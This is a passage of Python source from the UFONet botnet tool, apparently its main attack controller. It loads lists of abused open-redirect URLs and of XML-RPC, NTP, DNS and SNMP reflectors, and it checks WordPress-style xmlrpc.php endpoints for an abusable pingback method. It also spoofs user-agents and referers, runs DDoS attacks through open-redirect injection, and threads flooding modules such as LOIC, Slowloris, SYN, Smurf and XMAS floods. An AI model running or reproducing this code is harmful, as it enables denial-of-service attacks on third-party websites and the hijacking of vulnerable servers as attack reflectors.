if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
rpc_timeout = int(self.options.timeout)
except:
rpc_timeout = 5
else:
rpc_timeout = 5
if rpc_timeout < 1:
rpc_timeout = 5
req = urllib.request.Request(rpc, rpc_exploit.encode('utf-8'), headers)
urllib.request.urlopen(req, context=self.ctx, timeout=rpc_timeout)
self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats
if self.options.verbose:
print("[Info] [X-RPCs] Reply:", target_reply)
except:
print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (cannot connect!)")
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
else:
print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (invalid X-RPC!)")
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
if self.options.verbose:
print("[Info] [AI] [X-RPCs] "+str(name_rpc)+" is returning...")
if self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_rpcs(self):
# extract rpcs from file
options = self.options
try:
f = open(self.rpcs_file)
rpcs = f.readlines()
rpcs = [ rpc.replace('\r','') for rpc in rpcs ]
rpcs = [ rpc.replace('\n','') for rpc in rpcs ]
f.close()
if not rpcs:
print("[Info] [AI] [Control] Cannot retrieve [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
self.options.disablerpcs = True
return
else:
return rpcs
except:
if os.path.exists(self.rpcs_file) == True:
print("[Info] [AI] [Control] Cannot open [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [X-RPCs] from: 'botnet/rpcs.txt' [Discarding!]")
return
def extract_ntps(self):
# extract ntps from file
options = self.options
try:
f = open(self.ntps_file)
ntps = f.readlines()
ntps = [ ntp.replace('\r','') for ntp in ntps ]
ntps = [ ntp.replace('\n','') for ntp in ntps ]
f.close()
if not ntps:
print("[Info] [AI] [Control] Cannot retrieve [NTPs] from: 'botnet/ntp.txt' -> [Discarding!]")
return
else:
return ntps
except:
if os.path.exists(self.ntps_file) == True:
print("[Info] [AI] [Control] Cannot open [NTPs] from: 'botnet/ntp.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [NTPs] from: 'botnet/ntp.txt' [Discarding!]")
return
def extract_dnss(self):
# extract dnss from file
options = self.options
try:
f = open(self.dnss_file)
dnss = f.readlines()
dnss = [ dns.replace('\r','') for dns in dnss ]
dnss = [ dns.replace('\n','') for dns in dnss ]
f.close()
if not dnss:
print("[Info] [AI] [Control] Cannot retrieve [DNSs] from: 'botnet/dns.txt' -> [Discarding!]")
return
else:
return dnss
except:
if os.path.exists(self.dnss_file) == True:
print("[Info] [AI] [Control] Cannot open [DNSs] from: 'botnet/dns.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [DNSs] from: 'botnet/dns.txt' [Discarding!]")
return
def extract_snmps(self):
# extract snmps from file
options = self.options
try:
f = open(self.snmps_file)
snmps = f.readlines()
snmps = [ snmp.replace('\r','') for snmp in snmps ]
snmps = [ snmp.replace('\n','') for snmp in snmps ]
f.close()
if not snmps:
print("[Info] [AI] [Control] Cannot retrieve [SNMPs] from: 'botnet/snmp.txt' -> [Discarding!]")
return
else:
return snmps
except:
if os.path.exists(self.snmps_file) == True:
print("[Info] [AI] [Control] Cannot open [SNMPs] from: 'botnet/snmp.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [SNMPs] from: 'botnet/snmp.txt' [Discarding!]")
return
def extract_zombies(self):
options = self.options
if self.options.test:
try:
f = open(options.test)
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print("\n[Error] [AI] [Control] Cannot retrieve [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return
else:
return zombies
except:
if os.path.exists(options.test) == True:
print("\n[Error [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
try:
f = open(self.zombies_file)
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print("\n[Error] [AI] You haven't [Zombies] to be extracted from: 'botnet/zombies.txt' -> [Aborting!]\n")
return
else:
return zombies
except:
if os.path.exists(self.zombies_file) == True:
print("\n[Error] [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
def extract_target_list(self):
options = self.options
try:
f = open(options.target_list)
targets = f.readlines()
targets = [ target.replace('\n','') for target in targets ]
f.close()
if not targets:
print("\n[Error] [AI] [Control] Cannot retrieve [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return
else:
return targets
except:
if os.path.exists(options.target_list) == True:
print("\n[Error] [AI] [Control] Cannot found [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot open [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return #sys.exit(2)
def update_zombies(self, zombies_ready):
# update zombies on file
options = self.options
if options.attackme:
f = open(self.zombies_file, "w") # re-write list
for zombie in self.doll.real_zombies: # add only alien verified zombies
for x in zombie:
f.write(str(x) + os.linesep)
f.close()
if options.test or options.testall:
if not options.test:
options.test = self.zombies_file
f = open(options.test, "w") # re-write list only with zombies ready
for zombie in zombies_ready:
f.write(zombie + os.linesep)
f.close()
if options.search or options.dorks or options.autosearch or options.download or options.download_github: # append only new zombies to list (dorking supported)
f = open(self.zombies_file)
zombies_on_file = f.read().splitlines()
with open(self.zombies_file, "a") as zombie_list:
for zombie in zombies_ready:
if zombie not in zombies_on_file: # parse possible repetitions
zombie_list.write(zombie + os.linesep)
if options.download or options.download_github:
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
else:
self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking)
f.close()
def update_aliens(self, aliens_ready):
# update aliens on file
options = self.options
if options.download or options.download_github: # append only new aliens to list
f = open(self.aliens_file)
aliens_on_file = f.read().splitlines()
with open(self.aliens_file, "a") as alien_list:
for alien in aliens_ready:
if alien not in aliens_on_file: # parse possible repetitions
alien_list.write(alien + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_droids(self, droids_ready):
# update droids on file
options = self.options
if options.download or options.download_github: # append only new droids to list
f = open(self.droids_file)
droids_on_file = f.read().splitlines()
with open(self.droids_file, "a") as droid_list:
for droid in droids_ready:
if droid not in droids_on_file: # parse possible repetitions
droid_list.write(droid + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_ucavs(self, ucavs_ready):
# update ucavs on file
options = self.options
if options.download or options.download_github: # append only new ucavs to list
f = open(self.ucavs_file)
ucavs_on_file = f.read().splitlines()
with open(self.ucavs_file, "a") as ucav_list:
for ucav in ucavs_ready:
if ucav not in ucavs_on_file: # parse possible repetitions
ucav_list.write(ucav + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_rpcs(self, rpcs_ready):
# update rpcs on file
options = self.options
if options.testrpc or options.testall:
f = open(self.rpcs_file, "w") # re-write list
for rpc in rpcs_ready: # add only rpc verified zombies
f.write(rpc + os.linesep)
f.close()
if options.download or options.download_github: # append only new rpcs to list
f = open(self.rpcs_file)
rpcs_on_file = f.read().splitlines()
with open(self.rpcs_file, "a") as rpc_list:
for rpc in rpcs_ready:
if rpc not in rpcs_on_file: # parse possible repetitions
rpc_list.write(rpc + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_dnss(self, dnss_ready):
# update dns on file
options = self.options
if options.download or options.download_github: # append only new dns to list
f = open(self.dnss_file)
dnss_on_file = f.read().splitlines()
with open(self.dnss_file, "a") as dns_list:
for dns in dnss_ready:
if dns not in dnss_on_file: # parse possible repetitions
dns_list.write(dns + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_ntps(self, ntps_ready):
# update ntps on file
options = self.options
if options.download or options.download_github: # append only new ntps to list
f = open(self.ntps_file)
ntps_on_file = f.read().splitlines()
with open(self.ntps_file, "a") as ntp_list:
for ntp in ntps_ready:
if ntp not in ntps_on_file: # parse possible repetitions
ntp_list.write(ntp + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_snmps(self, snmps_ready):
# update snmps on file
options = self.options
if options.download or options.download_github: # append only new snmps to list
f = open(self.snmps_file)
snmps_on_file = f.read().splitlines()
with open(self.snmps_file, "a") as snmp_list:
for snmp in snmps_ready:
if snmp not in snmps_on_file: # parse possible repetitions
snmp_list.write(snmp + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def search_rpc(self, rpc_host):
options = self.options
rpc_vulnerable = False
rpc_pingback_url = False
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
if self.options.testall: # testing_all
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(rpc_host, None, headers)
rpc_code = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
for link in rpc_links:
if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
rpc_pingback_url = link[0]
rpc_vulnerable = True
break # found it!
else: # not any XML-RPC discovering methods are working
rpc_pingback_url = rpc_host + "/xmlrpc.php"
rpc_vulnerable = False
else:
if rpc_host.startswith("http://"):
rpc_host = rpc_host.replace("http://", "")
if rpc_host.startswith("https://"):
rpc_host = rpc_host.replace("https://", "")
rpc_host = urlparse(rpc_host)
rpc_path = rpc_host.path.replace("\r", "")
self.head = True # send HTTP HEAD request searching for: X-Pingback
reply = self.connect_zombie(rpc_path)
self.head = False
if "X-Pingback" in reply: # discovering pingback-enabled resources
m = re.search('X-Pingback: (.+?)\n', reply) # regex magics
rpc_pingback_url = m.group(1) # extract rpc server url
rpc_vulnerable = True
else: # not X-Pingback on HTTP Headers (search for <link rel="pingback"... on HTML/XHTML code)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req_rpc = urllib.request.Request(rpc_host, None, headers)
req_rpc.get_method = lambda : 'GET'
rpc_code = urllib.request.urlopen(req_rpc, context=self.ctx).read().decode('utf-8')
rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
for link in rpc_links:
if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
rpc_pingback_url = link[0]
rpc_vulnerable = True
break # found it!
else: # not any XML-RPC discovering methods are working
rpc_pingback_url = rpc_host + "/xmlrpc.php"
rpc_vulnerable = False
except: # something wrong discovering XML-RPC Pingback
pass
return rpc_vulnerable, rpc_pingback_url
def testing_offline(self):
# check for zombies offline
print ("\n[Info] [AI] Checking (sending HTTP HEAD requests) for [Zombies] offline...\n")
print('='*35)
zombies_online = 0
zombies_offline = 0
zombies = self.extract_zombies()
rpcs = self.extract_rpcs()
aliens = self.extract_aliens()
droids = self.extract_droids()
ucavs = self.extract_ucavs()
try:
botnet = zombies + rpcs + aliens + droids + ucavs
except:
return
discarded = [] # for discarded zombies
if not botnet:
return
self.head = True
for zombie in botnet:
zombie = str(zombie)
if zombie in zombies: # set zombie type (this way because cannot be same zombie with different type)
zombie_type = 'Zombie'
elif zombie in rpcs:
zombie_type = 'XML-RPC'
elif zombie in aliens:
zombie_type = 'Alien'
elif zombie in droids:
zombie_type = 'Droid'
elif zombie in ucavs:
zombie_type = 'UCAV'
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
if zombie_type == 'Alien': # [Aliens] are made with keyword ;$POST;
sep = ';$POST;'
zombie = zombie.split(sep, 1)[0]
try:
reply = str(self.connect_zombie(zombie))
except:
reply = None
if reply:
if reply == "200" or reply == "301" or reply == "302":
status = "ONLINE! -> [OK!]"
else:
status = "ONLINE! -> [BUT replying an INVALID HTTP CODE]"
zombies_online = zombies_online + 1
else:
status = "NOT Working!"
zombies_offline = zombies_offline + 1
print("\nName:", name_zombie)
print("Type: [", zombie_type, "]")
print("Vector:", zombie)
print("HTTP Code: [", reply, "]")
print("STATUS:", status)
print('-'*21)
if status == "NOT Working!": # add to discarded zombies
if zombie not in discarded:
discarded.append(zombie)
print("\n" + '='*52)
print("\n+ Total Botnet:", len(botnet))
print("\n" + '-'*25 + "\n")
print(" - ONLINE:", zombies_online)
print(" - OFFLINE:", zombies_offline, "\n")
print('='*52 + '\n')
self.head = False
if zombies_offline > 0:
if not self.options.forceyes:
test_reply = input("[AI] Do you want to update your army? (Y/n)\n")
print('-'*25 + "\n")
else:
test_reply = "Y"
if test_reply == "n" or test_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
print('='*52)
print("\n - DISCARDED:", disc_zombies)
new_botnet = int(len(botnet) - disc_zombies)
print("\n+ New Total Botnet:", str(new_botnet), "\n")
print('='*52 + '\n')
else:
print("[Info] [AI] [Control] ALL checked [Zombies] are ONLINE! -> [Exiting!]\n")
def send_extra_zombies(self):
# check for extra zombies: aliens, droids, rpcs, ucavs... and start attacking with them
if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Aliens] with heavy 'laser-cannon' weapons...")
aliens = [self.extract_aliens()] # extract aliens from file to a list
for a in aliens:
if a is None:
self.options.disablealiens = True
self.total_aliens = 0 # not any alien invoked
else:
for s in a: # extract number of aliens
self.total_aliens = self.total_aliens + 1
al = threading.Thread(target=self.send_aliens, args=(aliens)) # multithreading to send aliens
al.start()
else:
self.options.disablealiens = True
self.total_aliens = 0 # not any alien invoked
if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Droids] with light 'laser-cannon' weapons...")
droids = [self.extract_droids()] # extract droids from file to a list
for d in droids:
if d is None:
self.options.disabledroids = True
self.total_droids = 0 # not any droid invoked
else:
for s in d: # extract number of droids
self.total_droids = self.total_droids + 1
dr = threading.Thread(target=self.send_droids, args=(droids)) # multithreading to send droids
dr.start()
else:
self.options.disabledroids = True
self.total_droids = 0 # not any droid invoked
if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [X-RPCs] with 'plasma cannon' weapons...")
rpcs = [self.extract_rpcs()] # extract rpcs from file to a list
for r in rpcs:
if r is None:
self.options.disablerpcs = True
self.total_rpcs = 0 # not any rpc invoked
else:
for s in r: # extract number of rpcs
self.total_rpcs = self.total_rpcs + 1
rp = threading.Thread(target=self.send_rpcs, args=(rpcs)) # multithreading to send rpcs
rp.start()
else:
self.options.disablerpcs = True
self.total_rpcs = 0 # not any rpcs invoked
if not self.options.disableucavs and not self.options.attackme: # perform an external 'Is target up?' round check
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [UCAVs] with 'heat-beam' weapons and 'status check' scanners...")
ucavs = [self.extract_ucavs()] # extract ucavs from file to a list
for u in ucavs:
if u is None:
self.options.disableucavs = True
self.total_ucavs = 0 # not any ucav invoked
else:
for s in u: # extract number of ucavs
self.total_ucavs = self.total_ucavs + 1
uc = threading.Thread(target=self.send_ucavs, args=(ucavs)) # multithreading to send ucavs
uc.start()
else:
self.options.disableucavs = True
self.total_ucavs = 0 # not any ucavs invoked
def abandoning_zombies(self):
if self.options.expire: # set timing for purge
try:
timing = int(self.options.expire)
except:
timing = self.expire_timing # default timing for purge
else:
timing = self.expire_timing # default timing for purge
if timing < 1:
timing = self.expire_timing # default timing for purge
zombies_arrival_timing = timing # timing = trying to control round time for threading flow
zombies_lock = 0
if self.options.verbose:
print("[Info] [AI] [Control] Setting ["+str(zombies_arrival_timing)+"] per round for [Zombies] to return...")
while self.herd.no_more_zombies() == False: # abandoning -controller- zombies
zombies_lock = zombies_lock + 1
if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
if self.options.verbose:
print("\n[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
break
else:
time.sleep(1)
def discard_zombies(self, discarded):
disc_zombies = 0
if self.options.testoffline:
zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file]
else:
zombies_list = [self.zombies_file]
if not self.options.disablealiens: # add aliens
zombies_list.append(self.aliens_file)
if not self.options.disabledroids: # add droids
zombies_list.append(self.droids_file)
if not self.options.disablerpcs: # add rpcs
zombies_list.append(self.rpcs_file)
if not self.options.disableucavs: # add ucavs
zombies_list.append(self.ucavs_file)
for l in zombies_list:
f = open(l, "r+")
d = f.readlines()
f.close()
f = open(l, "w")
disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies)
f.close()
return disc_zombies
def remove_discarded_zombies(self, f, d, discarded, disc_zombies):
m = []
for zombie in d:
if zombie not in discarded == True:
m.append(zombie) # save it
else:
disc_zombies = disc_zombies + 1
if not m:
f.write("")
else:
for z in m:
f.write(z+os.linesep)
return disc_zombies
def parse_url_encoding(self, target):
t = urlparse(target)
host = urllib.parse.quote(t.netloc.encode('utf-8'))
path = urllib.parse.quote(t.path.encode('utf-8'))
query = urllib.parse.quote(t.query.encode('utf-8'))
if query:
if path.endswith(""):
path.replace("", "/")
query = urllib.parse.quote(t.query.encode('utf-8'))
target = t.scheme+"://"+host + path + "?" + query
else:
target = t.scheme+"://"+host + path
return target
def testing_rpcs(self, rpcs):
# discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution,
# Xoops, PHPGroupWare, TikiWiki, etc...) and update list
options = self.options
if self.options.testall: #testing_all
print('='*51)
print ("Are 'plasma' reflectors ready? :-) (XML-RPC 'Pingback' Vulnerability Check):")
print('='*51)
num_active_rpcs = 0
num_failed_rpcs = 0
rpcs_ready = []
print("Trying:", len(rpcs))
print('-'*21)
for rpc in rpcs:
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if rpc.startswith("http://") or rpc.startswith("https://"):
print("[Info] [X-RPCs] Exploiting 'X-Pingback' at:", rpc)
rpc_host = rpc.replace("/xmlrpc.php", "")
rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
rpc_methods = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
try:
req = urllib.request.Request(rpc_pingback_url, rpc_methods.encode('utf-8'), headers)
target_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
if DEBUG == True:
traceback.print_exc()
if self.options.verbose:
print("[Info] [X-RPCs] Reply:", target_reply)
if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
print("[Info] [AI] -> [VULNERABLE!]")
rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats
else:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
except:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
else:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
print('-'*21)
print('='*18)
print("OK:", num_active_rpcs, "Fail:", num_failed_rpcs)
print('='*18)
if self.options.testall: # testing_all
return rpcs_ready, num_active_rpcs, num_failed_rpcs
else:
# update 'rpcs' list
if num_active_rpcs == 0:
print("\n[Info] [X-RPCs] Not any vulnerable 'XML-RPC' active!\n")
return
else:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
self.update_rpcs(rpcs_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
def testing(self, zombies):
# test Open Redirect exploiting and show statistics
# HTTP HEAD check
army = 0
print ("Are 'they' alive? :-) (HEAD Check):")
print('='*35)
num_active_zombies = 0
num_failed_zombies = 0
active_zombies = []
print("Trying:", len(zombies))
print('-'*21)
for zombie in zombies:
zombie = str(zombie)
if zombie.startswith("http://") or zombie.startswith("https://"):
# send HEAD connection
self.head = True
try:
self.connect_zombies(zombie)
except:
pass
while self.herd.no_more_zombies() == False:
time.sleep(1)
for zombie in self.herd.done:
zombie = str(zombie)
t = urlparse(zombie)
if self.herd.get_result(zombie):
code_reply = self.herd.get_result(zombie)
self.head = False
if code_reply == "200" or code_reply == "302" or code_reply == "301": # HEAD check pass!
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
print("Zombie:", name_zombie)
print("Status: OK ["+ code_reply + "]")
num_active_zombies = num_active_zombies + 1
active_zombies.append(zombie)
elif code_reply == "401":
print("Zombie:", t.netloc)
print("Status: Unauthorized ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "403":
print("Zombie:", t.netloc)
print("Status: Error Forbidden ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "404":
print("Zombie:", t.netloc)
print("Status: Not Found ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "500":
print("Zombie:", t.netloc)
print("Status: Internal Server Error ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
else:
print("Zombie:", t.netloc, "\nVector:", zombie)
print("Status: Not Allowed ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
else:
if self.options.verbose:
print("[Info] [Zombies] Reply:", "\n\nNothing!!!!!\n")
print("Zombie:", zombie)
print("Status: Malformed!")
num_failed_zombies = num_failed_zombies + 1
print('-'*10)
self.herd.reset()
print('='*18)
print("OK:", num_active_zombies, "Fail:", num_failed_zombies)
print('='*18 + "\n")
print('='*22)
if num_active_zombies > 0:
# check url parameter vectors
print ("Checking for payloads:")
print('='*22)
print("Trying:", num_active_zombies)
print('-'*21)
zombies_ready = []
num_waiting_zombies = 0
if num_active_zombies == 0:
num_disconnected_zombies = num_failed_zombies
else:
num_disconnected_zombies = 0
for zombie in active_zombies:
zombie = str(zombie)
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
self.payload = True
try:
self.connect_zombies(zombie)
except:
pass
self.payload = False
while self.herd.no_more_zombies() == False:
time.sleep(1)
for zombie in self.herd.done:
zombie = str(zombie)
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
payload_zombie = zombie
payload_reply = ""
print("Vector:", payload_zombie)
self.payload = True
if self.herd.get_result(zombie):
payload_reply = self.herd.get_result(zombie)
self.payload = False
if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
num_waiting_zombies = num_waiting_zombies + 1
print("Status:", "Waiting for orders... ;-)")
zombies_ready.append(zombie)
else:
num_disconnected_zombies = num_disconnected_zombies + 1
print("Status:", "Not ready...")
army = army + 1
print('-'*10)
self.herd.reset()
print('='*18)
print("OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies)
print('='*18 + "\n")
# list of [Zombies] ready to attack
num_active_zombie = 0
for z in zombies_ready:
t = urlparse(z)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = z
num_active_zombie = num_active_zombie + 1
if self.options.verbose:
print("Zombie [", num_active_zombie, "]:", name_zombie + "\n")
if self.options.testall: # testing_all
return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies
else:
print('-'*25 + "\n")
print('='*24)
print("Working [Zombies]:", num_active_zombie)
print('='*24)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
self.update_zombies(zombies_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking)
else:
print('-'*25 + "\n")
print('='*24)
print("Working [Zombies]:", num_active_zombies)
print('='*24)
print("\n[Info] [AI] [Zombies] aren't replying to your HTTP HEAD requests! -> [Exiting!]\n")
def testing_all(self):
# test whole botnet
print ("\nChecking if [Zombies] are still infected (WARNING: this may take serveral time!)\n")
print('='*35)
zombies = self.extract_zombies()
rpcs = self.extract_rpcs()
aliens = self.extract_aliens()
droids = self.extract_droids()
ucavs = self.extract_ucavs()
try:
botnet = zombies + rpcs + aliens + droids + ucavs
tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs
except:
return
zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies)
rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs)
print("\n" + '='*52)
print("\n+ Total Botnet:", len(botnet))
print("\n" + '-'*25)
print("\n+ Total Tested:", len(tested_zombies))
print("\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]")
print(" - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n")
print('='*52 + '\n')
if num_disconnected_zombies > 0 or num_failed_rpcs > 0:
if not self.options.forceyes:
update_reply = input("[AI] Do you want update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
if num_disconnected_zombies > 0:
self.update_zombies(zombies_ready)
if num_failed_rpcs > 0:
self.update_rpcs(rpcs_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
else:
print("[Info] [AI] [Control] ALL tested [Zombies] are working! ;-) -> [Exiting!]\n")
def attacking(self, zombies, target):
# perform a DDoS Web attack using Open Redirect vectors (and other Web Abuse services) as [Zombies]
if self.options.forcessl:
if target.startswith("http://"):
target = target.replace("http://", "https://") # force SSL/TLS
if target.startswith("http://") or target.startswith("https://"):
print("Attacking:", target)
print('='*55, "\n")
# send Open Redirect injection (multiple zombies > one target url)
reply = self.injection(target, zombies)
else:
print("\n[Error] [AI] Target not valid: "+target+" -> [Discarding!]\n")
def aiming_extra_weapons(self, target, proxy, loic, loris, ufosyn, spray, smurf, fraggle, xmas, ufoack, uforst, droper, overlap, pinger, ufoudp, nuke, tachyon, monlist, sniper):
# perform some other extra attacks (such as DoS techniques)
time.sleep(2) # aiming (multi-threading flow time compensation)
if loic:
try:
self.options.loic = int(loic)
except:
self.options.loic = 100 # default LOIC requests
if self.options.loic < 1:
self.options.loic = 100
self.instance = LOIC() # instance main class for LOIC operations
self.t1 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, proxy)) # LOIC using threads + proxy
self.t1.daemon = True # extra weapons are threaded as daemons
self.t1.start()
self.update_loic_stats() # add new LOIC attack to mothership stats
if loris:
try:
self.options.loris = int(loris)
except:
self.options.loris = 101 # default LORIS requests (apache -> max_clients: ~100 | nginx -> no limit (other method))
if self.options.loris < 1:
self.options.loris = 101
self.instance = LORIS() # instance main class for LORIS operations
self.t2 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loris)) # LORIS using threads
self.t2.daemon = True
self.t2.start()
self.update_loris_stats() # add new LORIS attack to mothership stats
if ufosyn:
try:
self.options.ufosyn = int(ufosyn)
except:
self.options.ufosyn = 100 # default UFOSYN requests
if self.options.ufosyn < 1:
self.options.ufosyn = 100
self.instance = UFOSYN() # instance main class for UFOSYN operations
self.t3 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufosyn)) # UFOSYN using threads
self.t3.daemon = True
self.t3.start()
self.update_ufosyn_stats() # add new UFOSYN attack to mothership stats
if spray:
try:
self.options.spray = int(spray)
except:
self.options.spray = 100 # default SPRAY requests
if self.options.spray < 1:
self.options.spray = 100
self.instance = SPRAY() # instance main class for SPRAY operations
self.t4 = threading.Thread(target=self.instance.attacking, args=(target, self.options.spray)) # SPRAY using threads
self.t4.daemon = True
self.t4.start()
self.update_spray_stats() # add new SPRAY attack to mothership stats
if smurf:
try:
self.options.smurf = int(smurf)
except:
self.options.smurf = 101 # default SMURF requests
if self.options.smurf < 1:
self.options.smurf = 101
self.instance = SMURF() # instance main class for SMURF operations
self.t5 = threading.Thread(target=self.instance.attacking, args=(target, self.options.smurf)) # SMURF using threads
self.t5.daemon = True
self.t5.start()
self.update_smurf_stats() # add new SMURF attack to mothership stats
if xmas:
try:
self.options.xmas = int(xmas)
except:
self.options.xmas = 101 # default XMAS requests
if self.options.xmas < 1:
self.options.xmas = 101
self.instance = XMAS() # instance main class for XMAS operations
